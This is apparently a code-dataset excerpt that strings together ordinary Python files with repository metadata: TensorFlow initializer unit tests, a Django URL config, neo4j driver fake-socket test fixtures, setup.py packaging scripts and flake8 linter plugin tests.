dtypes.int32) 
self.assertEqual(math_ops.range(zero_int64, 0, 1).dtype, dtypes.int64) self.assertEqual(math_ops.range(zero_float32, 0, 1).dtype, dtypes.float32) self.assertEqual(math_ops.range(zero_float64, 0, 1).dtype, dtypes.float64) self.assertEqual( math_ops.range(zero_int32, zero_int64, 1).dtype, dtypes.int64) self.assertEqual( math_ops.range(zero_int64, zero_float32, 1).dtype, dtypes.float32) self.assertEqual( math_ops.range(zero_float32, zero_float64, 1).dtype, dtypes.float64) self.assertEqual( math_ops.range(zero_float64, zero_int32, 1).dtype, dtypes.float64) self.assertEqual( math_ops.range( 0, 0, 1, dtype=dtypes.int32).dtype, dtypes.int32) self.assertEqual( math_ops.range( 0, 0, 1, dtype=dtypes.int64).dtype, dtypes.int64) self.assertEqual( math_ops.range( 0, 0, 1, dtype=dtypes.float32).dtype, dtypes.float32) self.assertEqual( math_ops.range( 0, 0, 1, dtype=dtypes.float64).dtype, dtypes.float64) # TODO(vrv): move to sequence_ops_test? class LinSpaceTest(test.TestCase): def _gpu_modes(self): if test.is_gpu_available(): return [False, True] else: return [False] def _LinSpace(self, start, stop, num): # NOTE(touts): Needs to pass a graph to get a new session each time. with ops.Graph().as_default() as graph: with self.test_session(graph=graph, force_gpu=self.force_gpu): tf_ans = math_ops.linspace(start, stop, num, name="linspace") self.assertEqual([num], tf_ans.get_shape()) return tf_ans.eval() def testPositive(self): for self.force_gpu in self._gpu_modes(): self.assertArrayNear(self._LinSpace(1., 5., 1), np.array([1.]), 1e-5) self.assertArrayNear(self._LinSpace(1., 5., 2), np.array([1., 5.]), 1e-5) self.assertArrayNear( self._LinSpace(1., 5., 3), np.array([1., 3., 5.]), 1e-5) self.assertArrayNear( self._LinSpace(1., 5., 4), np.array([1., 7. / 3., 11. 
/ 3., 5.]), 1e-5) def testNegative(self): for self.force_gpu in self._gpu_modes(): self.assertArrayNear(self._LinSpace(-1., -5., 1), np.array([-1.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., -5., 2), np.array([-1., -5.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., -5., 3), np.array([-1., -3., -5.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., -5., 4), np.array([-1., -7. / 3., -11. / 3., -5.]), 1e-5) def testNegativeToPositive(self): for self.force_gpu in self._gpu_modes(): self.assertArrayNear(self._LinSpace(-1., 5., 1), np.array([-1.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., 5., 2), np.array([-1., 5.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., 5., 3), np.array([-1., 2., 5.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., 5., 4), np.array([-1., 1., 3., 5.]), 1e-5) def testPoint(self): for self.force_gpu in self._gpu_modes(): self.assertArrayNear(self._LinSpace(5., 5., 1), np.array([5.]), 1e-5) self.assertArrayNear(self._LinSpace(5., 5., 2), np.array([5.] * 2), 1e-5) self.assertArrayNear(self._LinSpace(5., 5., 3), np.array([5.] * 3), 1e-5) self.assertArrayNear(self._LinSpace(5., 5., 4), np.array([5.] 
* 4), 1e-5) class DeviceTest(test.TestCase): def testNoDevice(self): with ops.Graph().as_default(): var = variables.Variable([[1.0, 1.0]]) self.assertDeviceEqual(None, var.device) self.assertDeviceEqual(None, var.initializer.device) def testDevice(self): with ops.Graph().as_default(): with ops.device("/job:ps"): var = variables.Variable([[1.0, 1.0]]) self.assertDeviceEqual("/job:ps", var.device) self.assertDeviceEqual("/job:ps", var.initializer.device) class OrthogonalInitializerTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype) init2 = init_ops.orthogonal_initializer(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2, (10, 10))) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype) init2 = init_ops.orthogonal_initializer(seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2, (10, 10))) def testDuplicatedInitializer(self): init = init_ops.orthogonal_initializer() self.assertFalse(duplicated_initializer(self, init, 1, (10, 10))) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.orthogonal_initializer, dtype=dtypes.string) def testInvalidShape(self): init1 = init_ops.orthogonal_initializer() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init1, shape=[5]) def testGain(self): shape = (10, 10) for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype) init2 = init_ops.orthogonal_initializer(gain=3.14, seed=1, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): t1 = init1(shape).eval() t2 = init2(shape).eval() return np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15) def testShapesValues(self): for dtype in [dtypes.float32, dtypes.float64]: for shape in [(10, 10), (10, 9, 8), (100, 5, 5), (50, 40), (40, 50)]: 
init = init_ops.orthogonal_initializer(dtype=dtype) tol = 1e-5 if dtype == dtypes.float32 else 1e-12 with self.test_session(graph=ops.Graph(), use_gpu=True): # Check the shape t = init(shape).eval() self.assertAllEqual(shape, t.shape) # Check orthogonality by computing the inner product t = t.reshape((np.prod(t.shape[:-1]), t.shape[-1])) if t.shape[0] > t.shape[1]: self.assertAllClose( np.dot(t.T, t), np.eye(t.shape[1]), rtol=tol, atol=tol) else: self.assertAllClose( np.dot(t, t.T), np.eye(t.shape[0]), rtol=tol, atol=tol) class ConvolutionDeltaOrthogonalInitializerTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_delta_orthogonal(seed=1, dtype=dtype) init2 = init_ops.convolutional_delta_orthogonal(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2, (3, 3, 10, 10))) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_delta_orthogonal(seed=1, dtype=dtype) init2 = init_ops.convolutional_delta_orthogonal(seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2, (3, 3, 10, 10))) def testDuplicatedInitializer(self): init = init_ops.convolutional_delta_orthogonal() self.assertFalse(duplicated_initializer(self, init, 1, (3, 3, 10, 10))) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.convolutional_delta_orthogonal, dtype=dtypes.string) def testInvalidShape(self): init1 = init_ops.convolutional_delta_orthogonal() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init1, shape=[3, 3, 6, 5]) def testGain(self): shape = (3, 3, 10, 10) for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_delta_orthogonal(seed=1, dtype=dtype) init2 = init_ops.convolutional_delta_orthogonal(gain=3.14, seed=1, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): t1 = init1(shape).eval() t2 = init2(shape).eval() return 
np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15) def testShapesValues(self): gain = 3.14 for dtype in [dtypes.float32]: for kernel_size in [[3], [8], [3, 5], [2, 4], [3, 3, 3], [2, 2, 2]]: tol = 1e-2 # Check orthogonality by computing ratio between # the 2-norms of the inputs and outputs. if len(kernel_size) == 1: shape = [4, 32, 64] convolution = convolutional.conv1d elif len(kernel_size) == 2: convolution = convolutional.conv2d shape = [4, 32, 32, 64] else: shape = [4, 16, 16, 16, 64] convolution = convolutional.conv3d inputs = random_ops.random_normal(shape, dtype=dtype) inputs_2norm = linalg_ops.norm(inputs) outputs = convolution( inputs, padding="same", filters=128, kernel_size=kernel_size, use_bias=False, kernel_initializer=init_ops.convolutional_delta_orthogonal( gain=gain)) outputs_shape = shape[0:-1] + [128] outputs_2norm = linalg_ops.norm(outputs) ratio = outputs_2norm / inputs_2norm my_ops = variables.global_variables_initializer() with self.test_session(use_gpu=True) as sess: sess.run(my_ops) # Check the shape of the outputs t = outputs.eval() self.assertAllEqual(t.shape, outputs_shape) # Check isometry of the delta-orthogonal kernel. 
self.assertAllClose(sess.run(ratio), np.sqrt(gain), rtol=tol, atol=tol) def testNonuniformity(self): value = 0 abs_value = 0 shape = [3, 3, 10, 10] count = 70 tol = 1e-5 with self.test_session(use_gpu=True): for i in range(count): x = variable_scope.get_variable("{}".format(i), shape=shape, initializer= init_ops.convolutional_delta_orthogonal) x.initializer.run() y = x.eval()[1, 1, :, :] determinant = np.linalg.det(y) value += determinant abs_value += np.abs(determinant) # Check there is some variation in the signs of the determinants self.assertLess(value, count - tol) self.assertLess(-count + tol, value) # Check all determinants have absolute value 1 # Compute the sum of the absolute values of 'count' determinants self.assertAllClose(abs_value, count, rtol=tol, atol=tol) class ConvolutionOrthogonal1dInitializerTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_1d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_1d(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2, (3, 10, 10))) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_1d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_1d(seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2, (3, 10, 10))) def testDuplicatedInitializer(self): init = init_ops.convolutional_orthogonal_1d() self.assertFalse(duplicated_initializer(self, init, 1, (3, 10, 10))) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.convolutional_orthogonal_1d, dtype=dtypes.string) def testInvalidShape(self): init1 = init_ops.convolutional_orthogonal_1d() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init1, shape=[3, 6, 5]) def testGain(self): shape = (3, 10, 10) for dtype in [dtypes.float32, dtypes.float64]: init1 = 
init_ops.convolutional_orthogonal_1d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_1d(gain=3.14, seed=1, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): t1 = init1(shape).eval() t2 = init2(shape).eval() return np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15) def testNonuniformity(self): value = 0 abs_value = 0 shape = [3, 10, 10] count = 70 tol = 1e-5 with self.test_session(use_gpu=True): for i in range(count): x = variable_scope.get_variable("{}".format(i), shape=shape, initializer= init_ops.convolutional_orthogonal_1d) x.initializer.run() y = np.sum(x.eval(), axis=0) determinant = np.linalg.det(y) value += determinant abs_value += np.abs(determinant) # Check there is some variation in the signs of the determinants. self.assertLess(value, count - tol) self.assertLess(-count + tol, value) # Check all determinants have absolute value 1 # Compute the sum of the absolute values of 'count' determinants self.assertAllClose(abs_value, count, rtol=tol, atol=tol) def testShapesValues(self): def circular_pad(input_, width, kernel_size): """Pad input_ for computing (circular) convolution. Args: input_: the input tensor width: the width of the tensor. kernel_size: the kernel size of the filter. Returns: a tensor whose width is (width + kernel_size - 1). """ beginning = kernel_size // 2 end = kernel_size - 1 - beginning tmp_up = array_ops.slice(input_, [0, width - beginning, 0], [-1, beginning, -1]) tmp_down = array_ops.slice(input_, [0, 0, 0], [-1, end, -1]) tmp = array_ops.concat([tmp_up, input_, tmp_down], 1) return tmp cout = 64 shape = [10, 20, 32] outputs_shape = shape[0:-1] + [cout] dtype = dtypes.float32 tol = 1e-3 gain = 3.14 # Check orthogonality/isometry by computing the ratio between # the 2-norms of the inputs and ouputs. 
for kernel_size in [[1], [2], [3], [4], [5], [6]]: convolution = convolutional.conv1d inputs = random_ops.random_normal(shape, dtype=dtype) inputs_2norm = linalg_ops.norm(inputs) input_with_circular_pad = circular_pad(inputs, shape[1], kernel_size[0]) outputs = convolution( input_with_circular_pad, padding="valid", filters=cout, kernel_size=kernel_size[0], use_bias=False, kernel_initializer=init_ops.convolutional_orthogonal_1d(gain=gain)) outputs_2norm = linalg_ops.norm(outputs) ratio = outputs_2norm / inputs_2norm my_ops = variables.global_variables_initializer() with self.test_session(use_gpu=True) as sess: sess.run(my_ops) # Check the shape of the outputs t = outputs.eval() self.assertAllEqual(t.shape, outputs_shape) # Check isometry of the orthogonal kernel. self.assertAllClose(sess.run(ratio), np.sqrt(gain), rtol=tol, atol=tol) class ConvolutionOrthogonal2dInitializerTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_2d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_2d(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2, (3, 3, 10, 10))) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_2d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_2d(seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2, (3, 3, 10, 10))) def testDuplicatedInitializer(self): init = init_ops.convolutional_orthogonal_2d() self.assertFalse(duplicated_initializer(self, init, 1, (3, 3, 10, 10))) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.convolutional_orthogonal_2d, dtype=dtypes.string) def testInvalidShape(self): init1 = init_ops.convolutional_orthogonal_2d() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init1, shape=[3, 3, 6, 5]) def testGain(self): shape = (3, 3, 10, 10) for dtype in 
[dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_2d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_2d(gain=3.14, seed=1, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): t1 = init1(shape).eval() t2 = init2(shape).eval() return np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15) def testShapesValues(self): def circular_pad(input_, width, kernel_size): """Pad input_ for computing (circular) convolution. Args: input_: the input tensor width: the width of the tensor. kernel_size: the kernel size of the filter. Returns: a tensor whose width is (width + kernel_size - 1). """ beginning = kernel_size // 2 end = kernel_size - 1 - beginning tmp_up = array_ops.slice(input_, [0, width - beginning, 0, 0], [-1, beginning, width, -1]) tmp_down = array_ops.slice(input_, [0, 0, 0, 0], [-1, end, width, -1]) tmp = array_ops.concat([tmp_up, input_, tmp_down], 1) new_width = width + kernel_size - 1 tmp_left = array_ops.slice(tmp, [0, 0, width - beginning, 0], [-1, new_width, beginning, -1]) tmp_right = array_ops.slice(tmp, [0, 0, 0, 0], [-1, new_width, end, -1]) final = array_ops.concat([tmp_left, tmp, tmp_right], 2) return final cout = 45 shape = [64, 28, 28, 32] outputs_shape = shape[0:-1] + [cout] dtype = dtypes.float32 tol = 1e-3 gain = 3.14 # Check orthogonality/isometry by computing the ratio between # the 2-norms of the inputs and ouputs. 
for kernel_size in [[1, 1], [2, 2], [3, 3], [4, 4], [5, 5]]: convolution = convolutional.conv2d inputs = random_ops.random_normal(shape, dtype=dtype) inputs_2norm = linalg_ops.norm(inputs) input_with_circular_pad = circular_pad(inputs, shape[1], kernel_size[0]) outputs = convolution( input_with_circular_pad, padding="valid", filters=cout, kernel_size=kernel_size, use_bias=False, kernel_initializer=init_ops.convolutional_orthogonal_2d(gain=gain)) outputs_2norm = linalg_ops.norm(outputs) ratio = outputs_2norm / inputs_2norm my_ops = variables.global_variables_initializer() with self.test_session(use_gpu=True) as sess: sess.run(my_ops) # Check the shape of the outputs t = outputs.eval() self.assertAllEqual(t.shape, outputs_shape) # Check isometry of the orthogonal kernel. self.assertAllClose(sess.run(ratio), np.sqrt(gain), rtol=tol, atol=tol) class ConvolutionOrthogonal3dInitializerTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_3d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_3d(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2, (3, 3, 3, 10, 10))) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_3d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_3d(seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2, (3, 3, 3, 10, 10))) def testDuplicatedInitializer(self): init = init_ops.convolutional_orthogonal_3d() self.assertFalse(duplicated_initializer(self, init, 1, (3, 3, 3, 10, 10))) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.convolutional_orthogonal_3d, dtype=dtypes.string) def testInvalidShape(self): init1 = init_ops.convolutional_orthogonal_3d() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init1, shape=[3, 3, 3, 6, 5]) def testGain(self): shape = (3, 3, 3, 10, 
10) for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_3d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_3d(gain=3.14, seed=1, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): t1 = init1(shape).eval() t2 = init2(shape).eval() return np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15) def testNonuniformity(self): value = 0 abs_value = 0 shape = [3, 3, 3, 5, 5] count = 20 tol = 1e-5 with self.test_session(use_gpu=True): for i in range(count): x = variable_scope.get_variable("{}".format(i), shape=shape, initializer= init_ops.convolutional_orthogonal_3d) x.initializer.run() y = np.sum(x.eval(), axis=(0, 1, 2)) determinant = np.linalg.det(y) value += determinant abs_value += np.abs(determinant) # Check there is some variation in the signs of the determinants self.assertLess(value, count - tol) self.assertLess(-count + tol, value) # Check all determinants have absolute value 1 # Compute the sum of the absolute values of 'count' determinants self.assertAllClose(abs_value, count, rtol=tol, atol=tol) def testShapesValues(self): def circular_pad(input_, width, kernel_size): """Padding input_ for computing circular convolution. Args: input_: the input tensor width: the width of the tensor. kernel_size: the kernel size of the filter. Returns: a tensor whose width is (width + kernel_size - 1). 
""" beginning = kernel_size // 2 end = kernel_size - 1 - beginning tmp_up = array_ops.slice(input_, [0, width - beginning, 0, 0, 0], [-1, beginning, -1, -1, -1]) tmp_down = array_ops.slice(input_, [0, 0, 0, 0, 0], [-1, end, -1, -1, -1]) tmp = array_ops.concat([tmp_up, input_, tmp_down], 1) tmp_left = array_ops.slice(tmp, [0, 0, width - beginning, 0, 0], [-1, -1, beginning, -1, -1]) tmp_right = array_ops.slice(tmp, [0, 0, 0, 0, 0], [-1, -1, end, -1, -1]) tmp = array_ops.concat([tmp_left, tmp, tmp_right], 2) tmp_front = array_ops.slice(tmp, [0, 0, 0, width - beginning, 0], [-1, -1, -1, beginning, -1]) tmp_back = array_ops.slice(tmp, [0, 0, 0, 0, 0], [-1, -1, -1, end, -1]) return array_ops.concat([tmp_front, tmp, tmp_back], 3) cout = 32 shape = [1, 7, 7, 7, 16] outputs_shape = shape[0:-1] + [cout] dtype = dtypes.float32 tol = 1e-3 gain = 3.14 # Check orthogonality/isometry by computing the ratio between # the 2-norms of the inputs and ouputs. for kernel_size in [[1, 1, 1], [2, 2, 2], [3, 3, 3]]: convolution = convolutional.conv3d inputs = random_ops.random_normal(shape, dtype=dtype) inputs_2norm = linalg_ops.norm(inputs) input_with_circular_pad = circular_pad(inputs, shape[1], kernel_size[0]) outputs = convolution( input_with_circular_pad, padding="valid", filters=cout, kernel_size=kernel_size[0], use_bias=False, kernel_initializer=init_ops.convolutional_orthogonal_3d(gain=gain)) outputs_2norm = linalg_ops.norm(outputs) ratio = outputs_2norm / inputs_2norm my_ops = variables.global_variables_initializer() with self.test_session(use_gpu=True) as sess: sess.run(my_ops) # Check the shape of the outputs t = outputs.eval() self.assertAllEqual(t.shape, outputs_shape) # Check isometry of the orthogonal kernel. 
self.assertAllClose(sess.run(ratio), np.sqrt(gain), rtol=tol, atol=tol) class IdentityInitializerTest(test.TestCase): def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.orthogonal_initializer, dtype=dtypes.string) def testInvalidShape(self): init = init_ops.identity_initializer() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init, shape=[5, 7, 7]) self.assertRaises(ValueError, init, shape=[5]) self.assertRaises(ValueError, init, shape=[]) def testNonSquare(self): init = init_ops.identity_initializer() shape = (10, 5) with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertAllClose(init(shape).eval(), np.eye(*shape)) def testGain(self): shape = (10, 10) for dtype in [dtypes.float32, dtypes.float64]: init_default = init_ops.identity_initializer(dtype=dtype) init_custom = init_ops.identity_initializer(gain=0.9, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertAllClose(init_default(shape).eval(), np.eye(*shape)) with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertAllClose(init_custom(shape).eval(), np.eye(*shape) * 0.9) def testPartitions(self): shape = (10, 10) init = init_ops.identity_initializer() partitioner = partitioned_variables.variable_axis_size_partitioner(1) with self.test_session(graph=ops.Graph(), use_gpu=True): with variable_scope.variable_scope( "foo", partitioner=partitioner, initializer=init): v = array_ops.identity(variable_scope.get_variable("bar", shape=shape)) variables.global_variables_initializer().run() self.assertAllClose(v.eval(), np.eye(*shape)) if __name__ == "__main__": test.main()
39.484259
80
0.658373
795aa716de8a59aaf48ad8674900ae0e3b5bd283
133
py
Python
sheet/urls.py
metadeng/LVTUBEN_CD_TOOLKIL
217e78974b171276d69fcc8f75719be44c218c9d
[ "MIT" ]
null
null
null
sheet/urls.py
metadeng/LVTUBEN_CD_TOOLKIL
217e78974b171276d69fcc8f75719be44c218c9d
[ "MIT" ]
11
2020-02-12T00:14:11.000Z
2022-03-11T23:46:37.000Z
sheet/urls.py
metadeng/LVTUBEN_CD_TOOLKIL
217e78974b171276d69fcc8f75719be44c218c9d
[ "MIT" ]
null
null
null
from django.urls import path from sheet import views app_name = 'sheet' urlpatterns = [ path('', views.index, name='index'), ]
14.777778
40
0.684211
795aa7ae04ef88c6b8c48e573fe43dc6312f65a9
3,991
py
Python
tests/unit/sync/io/conftest.py
polyrize/neo4j-python-driver
1ed96f94a7a59f49c473dadbb81715dc9651db98
[ "Apache-2.0" ]
null
null
null
tests/unit/sync/io/conftest.py
polyrize/neo4j-python-driver
1ed96f94a7a59f49c473dadbb81715dc9651db98
[ "Apache-2.0" ]
null
null
null
tests/unit/sync/io/conftest.py
polyrize/neo4j-python-driver
1ed96f94a7a59f49c473dadbb81715dc9651db98
[ "Apache-2.0" ]
null
null
null
# Copyright (c) "Neo4j" # Neo4j Sweden AB [https://neo4j.com] # # This file is part of Neo4j. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from io import BytesIO from struct import ( pack as struct_pack, unpack as struct_unpack, ) import pytest from neo4j._sync.io._common import MessageInbox from neo4j.packstream import ( Packer, UnpackableBuffer, Unpacker, ) class FakeSocket: def __init__(self, address): self.address = address self.captured = b"" self.messages = MessageInbox(self, on_error=print) def getsockname(self): return "127.0.0.1", 0xFFFF def getpeername(self): return self.address def recv_into(self, buffer, nbytes): data = self.captured[:nbytes] actual = len(data) buffer[:actual] = data self.captured = self.captured[actual:] return actual def sendall(self, data): self.captured += data def close(self): return def pop_message(self): return self.messages.pop() class FakeSocket2: def __init__(self, address=None, on_send=None): self.address = address self.recv_buffer = bytearray() self._messages = MessageInbox(self, on_error=print) self.on_send = on_send def getsockname(self): return "127.0.0.1", 0xFFFF def getpeername(self): return self.address def recv_into(self, buffer, nbytes): data = self.recv_buffer[:nbytes] actual = len(data) buffer[:actual] = data self.recv_buffer = self.recv_buffer[actual:] return actual def sendall(self, data): if callable(self.on_send): self.on_send(data) def close(self): return def inject(self, data): self.recv_buffer += data def 
_pop_chunk(self): chunk_size, = struct_unpack(">H", self.recv_buffer[:2]) print("CHUNK SIZE %r" % chunk_size) end = 2 + chunk_size chunk_data, self.recv_buffer = self.recv_buffer[2:end], self.recv_buffer[end:] return chunk_data def pop_message(self): data = bytearray() while True: chunk = self._pop_chunk() print("CHUNK %r" % chunk) if chunk: data.extend(chunk) elif data: break # end of message else: continue # NOOP header = data[0] n_fields = header % 0x10 tag = data[1] buffer = UnpackableBuffer(data[2:]) unpacker = Unpacker(buffer) fields = [unpacker.unpack() for _ in range(n_fields)] return tag, fields def send_message(self, tag, *fields): data = self.encode_message(tag, *fields) self.sendall(struct_pack(">H", len(data)) + data + b"\x00\x00") @classmethod def encode_message(cls, tag, *fields): b = BytesIO() packer = Packer(b) for field in fields: packer.pack(field) return bytearray([0xB0 + len(fields), tag]) + b.getvalue() class FakeSocketPair: def __init__(self, address): self.client = FakeSocket2(address) self.server = FakeSocket2() self.client.on_send = self.server.inject self.server.on_send = self.client.inject @pytest.fixture def fake_socket(): return FakeSocket @pytest.fixture def fake_socket_2(): return FakeSocket2 @pytest.fixture def fake_socket_pair(): return FakeSocketPair
25.420382
86
0.625658
795aa7cd6edd0197fe46cf8128288d33dff0951d
1,428
py
Python
setup.py
nodemash/safetyfirst
dab50ae7084e838d42a2617d94b83da958dcb615
[ "MIT" ]
null
null
null
setup.py
nodemash/safetyfirst
dab50ae7084e838d42a2617d94b83da958dcb615
[ "MIT" ]
null
null
null
setup.py
nodemash/safetyfirst
dab50ae7084e838d42a2617d94b83da958dcb615
[ "MIT" ]
null
null
null
import setuptools from safetyfirst.version import Version install_requires = [ 'pytest', 'pytest-cov', 'ndg-httpsclient', 'pyopenssl', 'pyasn1' ] setuptools.setup( name='safetyfirst', version=Version('1.0.0').number, description='Python SSL Checker', long_description=open('README.md').read().strip(), author='Robert Hoppe', author_email='robert.hoppe@nodemash.com', url='http://nodemash.com', py_modules=['safetyfirst'], install_requires=install_requires, license='MIT', zip_safe=False, keywords='ssl certificate validation', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Utilities' ], entry_points={ 'console_scripts': [ 'safety_ssl_check = safetyfirst.utilities.ssl_check:launch_new_instance' ] } )
30.382979
84
0.618347
795aa80d1fa73162de1cb85592f768632e048870
945
py
Python
setup.py
copyit/AnyAPI
528109878a16a29c4cf7ff20b2dfaee8d2234a13
[ "MIT" ]
null
null
null
setup.py
copyit/AnyAPI
528109878a16a29c4cf7ff20b2dfaee8d2234a13
[ "MIT" ]
null
null
null
setup.py
copyit/AnyAPI
528109878a16a29c4cf7ff20b2dfaee8d2234a13
[ "MIT" ]
null
null
null
import pathlib from setuptools import setup # The directory containing this file HERE = pathlib.Path(__file__).parent # The text of the README file README = (HERE / "README.md").read_text() # This call to setup() does all the work setup( name="anyapi", version="1.1.701", description="An API Wrapper For Every API", long_description=README, long_description_content_type="text/markdown", url="https://github.com/FKLC/AnyAPI", author="Fatih Kılıç", author_email="m.fatihklc0@gmail.com", license="MIT", classifiers=[ "Programming Language :: Python :: 3.5", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], packages=["anyapi"], install_requires=["requests", "AttributeRouter==1.0.0"], )
29.53125
60
0.648677
795aa93e431a800f272e05a0f648f4fb868aae61
2,100
py
Python
test/plugins/test_flake8_lint.py
borisbarath/python-language-server
b03f2d791e0ed66d5f1cc544869c0383cfdc3d9d
[ "MIT" ]
null
null
null
test/plugins/test_flake8_lint.py
borisbarath/python-language-server
b03f2d791e0ed66d5f1cc544869c0383cfdc3d9d
[ "MIT" ]
null
null
null
test/plugins/test_flake8_lint.py
borisbarath/python-language-server
b03f2d791e0ed66d5f1cc544869c0383cfdc3d9d
[ "MIT" ]
null
null
null
# Copyright 2019 Palantir Technologies, Inc. import tempfile import os from test.test_utils import MockWorkspace from mock import patch from pyls import lsp, uris from pyls.plugins import flake8_lint from pyls.workspace import Document DOC_URI = uris.from_fs_path(__file__) DOC = """import pyls t = "TEST" def using_const(): \ta = 8 + 9 \treturn t """ def temp_document(doc_text): temp_file = tempfile.NamedTemporaryFile(mode='w', delete=False) name = temp_file.name temp_file.write(doc_text) temp_file.close() doc = Document(uris.from_fs_path(name), MockWorkspace()) return name, doc def test_flake8_no_checked_file(config, workspace): # A bad uri or a non-saved file may cause the flake8 linter to do nothing. # In this situtation, the linter will return an empty list. doc = Document('', workspace, DOC) diags = flake8_lint.pyls_lint(config, doc) assert diags == [] def test_flake8_lint(config): try: name, doc = temp_document(DOC) diags = flake8_lint.pyls_lint(config, doc) msg = 'local variable \'a\' is assigned to but never used' unused_var = [d for d in diags if d['message'] == msg][0] assert unused_var['source'] == 'flake8' assert unused_var['code'] == 'F841' assert unused_var['range']['start'] == {'line': 5, 'character': 1} assert unused_var['range']['end'] == {'line': 5, 'character': 11} assert unused_var['severity'] == lsp.DiagnosticSeverity.Warning finally: os.remove(name) def test_flake8_config_param(config): with patch('pyls.plugins.flake8_lint.Popen') as popen_mock: mock_instance = popen_mock.return_value mock_instance.communicate.return_value = [bytes(), bytes()] flake8_conf = '/tmp/some.cfg' config.update({'plugins': {'flake8': {'config': flake8_conf}}}) _name, doc = temp_document(DOC) flake8_lint.pyls_lint(config, doc) call_args = popen_mock.call_args.args[0] assert 'flake8' in call_args assert '--config={}'.format(flake8_conf) in call_args
30.434783
78
0.672857
795aa94402e3cf6ef1b52a545714917549c9886a
